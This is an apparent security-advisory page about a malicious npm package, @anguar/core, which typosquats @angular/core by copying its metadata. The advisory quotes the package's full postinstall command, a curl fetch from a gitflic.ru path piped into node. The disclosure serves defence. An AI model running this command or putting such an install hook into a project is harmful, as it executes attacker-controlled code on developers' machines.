Logo
npm

@anguar/core@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC

Malicious

OSV ID

MAL-2026-17535

Ecosystem

npm

Summary

Package @anguar/core impersonates @angular/core: scope name differs by one letter and package.json name, description, author, and repository metadata are copied from the real @angular/core. The package.json declares a postinstall lifecycle hook that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from a gitflic.ru path under the user hellscripter (proxied through web.archive.org) and piping it into Node. The remote source is unpinned, unverified, hosted on infrastructure unrelated to the Angular project, and under full control of a third party. Any developer who mistypes the Angular scope and runs npm install will execute arbitrary attacker-controlled code on their machine.

Source: amazon-inspector (428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.